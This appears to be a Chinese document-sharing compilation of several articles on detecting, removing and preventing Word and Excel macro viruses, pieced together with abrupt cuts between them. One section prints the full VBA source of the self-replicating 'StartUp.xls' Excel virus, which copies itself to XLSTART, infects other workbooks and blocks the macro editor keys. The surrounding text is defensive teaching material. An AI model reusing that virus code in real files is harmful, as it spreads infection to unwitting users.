下载文档原格式
关于Word宏病毒的处理方法一、W97M.Lexar.B系列病毒现象:1、感染后的电脑,在保存Word文档时会弹出另存为对话框2、或提示在没有启用宏的文档中无法保存文件。
3、或提示文档存在二义性。
4、或发邮件时被退回,或收不到邮件。
5、导致OA编辑正文保存时出错、或保存不了正文、或无法盖章。
二、处理方法(必须严格遵守步骤处理):1、彻底关闭360杀毒。
2、删除“C:\Documents and Settings\(当前用户名)\Application Data\Microsoft\Templates”里面的模板文件。
3、下载最新的360杀毒软件:/indexbeta.html,安装并启动OFFICE病毒免疫。
三、具体处理步骤:1、关闭所有OFFICE文件。
2、显示隐藏的操作系统保护文件第一步:打开C盘选择“组织”,点击“文件夹和搜索选项”第二步:将隐藏文件选项按上图设置,确定第三步:在C盘找到“Documents and Settings”文件夹3、解除文件夹访问权限a)默认情况下“Documents and Settings”不可访问,需解除其访问权限b)解除步骤:第一步:右击“Documents and Settings”文件夹,选择属性,点击上图“高级”按钮第二步:打开高级安全设置选项卡,点击更改权限第三步:打开“更改高级权限设置”卡,选择图中的“拒绝”项,删除,确定4、进入文件夹逐级进入“C:\Documents and Settings\(当前用户名)\Application Data \Microsoft\Templates”文件夹,如遇到没有权限的文件夹则参照“3.3解除文件股权访问权限方法”解除权限。
5、删除文件夹内的所有文件文件删除后病毒即可删除。
6、启动新下载的360杀毒,下次打开有毒的文件时将会自动杀毒。
宏病毒原理及防范一、常见宏病毒1.startup宏病毒宏病毒其实并不神秘,其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建,新建的文件常放在xlsrt文件夹下。
然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。
下面先看看startup宏病毒代码吧,注意红字部分。
Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd Sub2.book1病毒book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。
防御、清除Excel宏病毒的方法
1、安装Office2007以上版本,如果使用Office2007以下版本的Execl禁用宏的操作与本文档
提供的方法有所区别,并且防御宏病毒的能力没有高版本强,所以推荐升级到Office2007以上版本。
2、禁用宏对宏病毒进行防御(如果使用到宏的功能请按照实际需求进行设置),具体方法
如下:
Excel选项->信任中心->信任中心设置->宏设置->禁用所有宏,并且不通知
3、手工删除Execl启动时自动打开的文件,查看Office安装目录XLSTART目录下是否存在有
文件(例:c:\Program Files\Microsoft Office\Office12\XLSTART\),如果存在文件并经过确认不是使用者设置的在Excle启动时自动打开的文件请将其删除。
4、清除现有文件中的宏病毒,使用专杀工具对所有分区进行扫描(Windows Vista以上版
本需要使用“以管理员身份运行”)。
MacroKiller.zip
如有问题请与信息工程部联系。
关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。
因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。
没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。
对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。
此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。
一定要将打开的文件作好备份再进行杀毒。
我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。
只有360查了出来并将病毒清除。
注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。
这样就能保证文件内容不会丢失了。
excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。
Office如何有效预防宏病毒简介宏病毒是一种利用Microsoft Office软件中的宏功能传播的恶意软件。
宏病毒可以通过恶意宏代码来执行各种破坏行为,如破坏、删除或篡改文件。
在工作环境中,使用Microsoft Office软件是不可避免的。
然而,有效预防宏病毒的传播变得尤为重要。
本文将介绍一些有效的预防宏病毒的方法,帮助您保护您的数据和计算机安全。
方法一:启用安全设置Microsoft Office软件提供了一些内置的安全设置,可以帮助有效预防宏病毒的传播。
以下是一些重要的安全设置:1. 禁用自动宏运行默认情况下,Office软件启用自动宏运行。
禁用自动宏运行可以防止恶意宏在打开文档时自动执行。
要禁用自动宏运行,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“禁用所有宏,并禁用通知”选项。
2. 禁用宏如果您不需要使用宏功能,禁用宏是一种有效的预防宏病毒的办法。
要禁用宏,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“不允许任何宏运行”选项。
3. 启用受信任的位置有时,您可能需要运行特定的宏或从受信任的位置打开文档。
为了更好地控制宏的运行,可以将受信任的位置添加到Office软件的信任中心。
要启用受信任的位置,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“受信任的位置”中,点击“添加新位置”按钮。
方法二:保持软件升级定期升级Microsoft Office软件是预防宏病毒的另一个重要步骤。
每个Office升级都包含了最新的安全补丁和修复程序,可以提供额外的安全保障。
要确保软件始终保持最新状态,可以按照以下步骤操作:•打开Office软件,点击“文件”菜单。
电脑宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
下面由店铺带你走进宏病毒中!让你充分的了解宏病毒!谢谢!宏病毒:一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
如果某个文档中包含了宏病毒,我们称此文档感染了宏病毒;如果WORD系统中的模板包含了宏病毒,我们称WORD系统感染了宏病毒。
来源虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒。
但当打开一个含有可能携带病毒的宏的文档时,它能够显示宏警告信息。
并且在2013年后的杀毒软件已支持宏病毒扫描。
这样就可选择打开文档时是否要包含宏,如果希望文档包含要用到的宏(例如,单位所用的定货窗体),打开文档时就包含宏。
如果您并不希望在文档中包含宏,或者不了解文档的确切来源。
例如,文档是作为电子邮件的附件收到的,或是来自网络或不安全的Internet节点。
在这种情况下,为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择“取消宏”。
OFFICE97软件包安装后,系统中包含有关于宏病毒防护的选项,其默认状态是允许“宏病毒保护”复选框。
如果愿意,您可以终止系统对文档宏病毒的检查。
当Word显示宏病毒警告信息时,清除“在打开带有宏或自定义内容的文档时提问”复选框。
或者关闭宏检查:单击“工具”菜单中的“选项”命令,再单击“常规”选项卡,然后清除“宏病毒保护”复选框。
不过我强烈建议您不要取消宏病毒防护功能,否则您会失去这道防护宏病毒的天然屏障。
上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。
并且会驻留在Normal面板上据统计,通过Internet传播的不同类型的病毒数量如下:DOS型: 10000至11000种Windows型:12种Macintosh型:35种宏病毒: 200余种Unix型: 6种其中10000-11000种DOS型病毒能感染所有DOS、Windows95平台的计算机(但不感染Macintosh计算机);但200余种宏病毒中的大部分能感染所有计算机,包括PC机和Macintosh机。
预防和清除宏病毒的方法摘要:宏是WORD中避免一再的重复相同的动作而设计出来的一种工具,宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
本文首先分析宏病毒的特性,并就如何检测、清除及预防进行了探讨。
关键词:宏病毒;WORD;预防;清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒,就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒。
1.宏病毒的工作原理在用W O R D 处理文档时,需要同时进行各种不同的动作,每一种动作其实都对应着特定的宏命令。
宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关,这些宏程序可能就是宏病毒的插入点。
病毒包含在宏中时,只要染毒的文件被打开,病毒的宏程序就可能会被执行,进而取得系统控制权,进行感染和破坏。
为了能广泛地传播,宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。
W O R D启动时总是自动打开通用模版,这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。
含有自动宏的染毒文档,当被其他计算机的WORD 打开时,也会自动感染该计算机。
宏是Word 里一个非常有用的工具,但也是Word 的安全漏洞之一。
有一些恶意的人利用宏制造宏病毒,给别人带来麻烦。
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
一旦打开这样的文档,宏病毒就会被激活,转移到计算机上,并驻留在Normal 模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
13.1 宏病毒宏病毒已经成为发展最快和传播最迅速的病毒。
美国国际计算机安全协会ICSA 的《ICSA 1998 病毒流行调查报告》表明宏病毒独占1998 年十大病毒感染事件的72%,在十大病毒中占了五席交椅:WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。
根据DataFellow 公司每天特征码升级的F-Macro 所检测到的宏病毒数目,至1998 年12 月达到了3,332 个,而在1997 年12 月才是1,821个,增长率为83.0%。
而且F-Macro 并不能检测到所有宏病毒。
在1998 年12 月出现了Word Class Object 的宏病毒,是由VicodinES编写的。
13.1.1 宏病毒许多应用程序都允许在用户的数据库中包含一些宏,随着应用软件的进步,宏语言的功能也越来越强大,其中微软的Word VisualBasic for Application(VBA)已经成为应用软件宏语言的标准。
利用宏语言,可以实现几乎所有的操作,还可以实现一些应用软件原来没有的功能。
每个模板或数据文件中,都可以包含宏命令。
有不少应用软件允许用户利用宏修改软件菜单的功能,并可以将某一个宏加入到菜单中或设置成自动运行的命令。
利用这个功能,宏就可以修改软件本身的功能,从而将软件本身修改为病毒传播的源泉。
宏病毒就是利用Word VBA 进行编写的一些宏,这些宏可以自动运行,干扰用户工作,轻则降低工作效率,重则破坏文件,使用户遭受巨大损失。
宏病毒及其防治方法探析
摘要:宏病毒的出现对办公软件的安全使用带来了极大的威胁,故文章在深入研究宏病毒作用机制的基础上,从发现病毒、清除病毒以及预防病毒三个方面对其防治方法进行了探析,以供参考。
关键词:宏病毒作用机制防治方法
前言:微软公司的microsoft word 几乎已经成为目前全世界办公文档的事实工业标准,而宏病毒就是是针对的字处理软件word 编写的一种病毒,其种类达数百种,危害日甚一日,感染率高达40%以上,已成为威胁计算机信息系统安全的主要因素。
因此,对其作用机制进行深入研究,制定切实有效的防治方法,从而最大限度地降低病毒带来的危害是十分必要的。
1.宏病毒的作用机制
word 的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素: 菜单、宏、格式( 如备忘录等)。
word 处理文档需要同时进行各种不同的动作,如打开文件、关闭文件、读取数据资料以及储存和打印等等。
每一种动作其实都对应着特定的宏命令。
通常,word 宏病毒至少会包含一个以上的自动宏( 如autoopen、autoclose、autoexec、autoexit和autonew 等) ,或者是一个以上的标准宏,如fileopen、filesaveas等。
如果某个.doc 文件感染了这类word 宏病毒,则当word 运行这类自动宏时,实际上就是运行了病毒代码。
一旦病毒宏侵入word 系统,它就会替
代原有的正常宏,如fileopen、filesave、filesaveas 和fileprint 等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。
当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。
宏病毒主要寄生于autoopen、autoclose 和autonew 3 个宏中,其引导、传染、表现或破坏均通过宏指令来完成的。
宏指令是用宏语言word basic 编写的,宏语言提供了许多系统级底层功能调用,因此,宏病毒利用宏语言实现其传染、表现或破坏的目的。
目前,几乎所有已知的宏病毒都沿用了相同的作用机理,即如果word 系统在读取一个染毒文件时遭受感染,则其后所有新创建的doc 文件都会被感染。
word 宏病毒几乎是唯一可跨越不同硬件平台而生存、传染和流行的一类病毒。
同时,由于word 允许对宏本身进行加密操作,因此有许多宏病毒是经过加密处理的,不经过特殊处理是无法进行编辑或观察的,这也是很多宏病毒无法手工杀除的主要原因。
2.宏病毒防治方法
2.1 发现word 宏病毒
尽管宏病毒的破坏性较大,而且具有一定的隐蔽性,采用常规的文件型病毒判定方法不能判断宏病毒的存在。
但根据宏病毒的传染机制,不难看出宏病毒传染中的特点。
所以通过以下方法可简单地判断某文档是否感染了宏病毒。
(1)在使用的word 中打开宏菜单,点中normal 模板,若发
现有autoopen、autonew、autoclose 等自动宏以及filesave、filesaveas、fileexit 等文件操作宏或一些怪名字的宏,如aaazao、payload 等,而自己又没有加载特殊模板,这就极可能是病毒在作祟了,因为大多数normal 模板中是不包含上述宏的。
(2)如发现打开一个文档,它未经任何改动,立即提示存盘操作,也有可能是word 带有病毒。
(3)打开以.doc 为后缀的文件在另存菜单中只能以模板方式存盘,而此时通用模板中含有宏,也有可能是word 有病毒。
2.2 清除word 宏病毒
清除宏病毒有两种方法,即手工清除和用杀毒工具清除:
(1)手工清除宏病毒
手工清除宏病毒步骤:①打开宏菜单,在通用模板中删除您认为是病毒的宏;②打开带有病毒宏的文档(模板) ,然后打开宏菜单,在通用模板和病毒文件名模板中删除您认为是病毒的宏;③保存清洁文档;④对剩余文件重复步骤①~③。
手工清除宏病毒有一定难度,而且不彻底,最好还是用杀毒软件清除安全可靠。
(2)用杀毒工具自动清除宏病毒
用杀毒工具自动清除宏病毒是理想的解决办法。
目前反病毒软件都具有对已知宏病毒杀除的功能,而且有的软件还能对未知病毒报警。
2.3 预防宏病毒
从宏病毒的特性和传播途径看,预防宏病毒的方法应从以下方面入手:
(1)对于已染病毒的文件首先应将normal .dot 中的自动宏清除( autoopen、auto-close、autonew) ,然后将normal .dot 置成只读方式。
(2)对于其他已染毒的文件均应将自动宏清除,这样就可以达到清除病毒的目的。
(3)平时使用时要加强预防。
对来历不明的宏最好予以删除。
如果发现后缀为.doc的文件变成模板时,则可怀疑其已染宏病毒,其主要表现是在saveas 文档时,选择文件类型的框变为灰色。
(4)在打开文件时,按住sh ift 键可以阻止自动宏的运行。
例如,当您用含有autonew宏的模板新建一个文档时,在“新建”对话框(“文件”菜单) 中单击“确定”按钮时按住shift 键,就可以阻止autonew 宏的执行。
您要按住shift 键直到新文档显示在窗口中。
在可以触发自动宏的宏中,您可以用disable auto macros 阻止运行自动宏。
(5)安装反病毒软件,启用实时反病毒功能,检查外来病毒包括int ernet、bbs 病毒对系统的入侵。
只有检查后,方可使用。
参考文献:
[1]王素芳.《word宏病毒简析》.科技信息(科学教研),2008
[2]梁玲.《宏病毒感染过程及防范措施研究》.科技情报开发与经济,2009
[3]高永仁.《预防和清除宏病毒的方法》.网络安全技术与应用,2007
[4]孙领弟,马彦芬.《word宏病毒的产生和清除方法》.河北工程技术高等专科学校学报,2002
[5]刘兴权.《关于word宏病毒的分析与防治》.山西电子技术,2001。
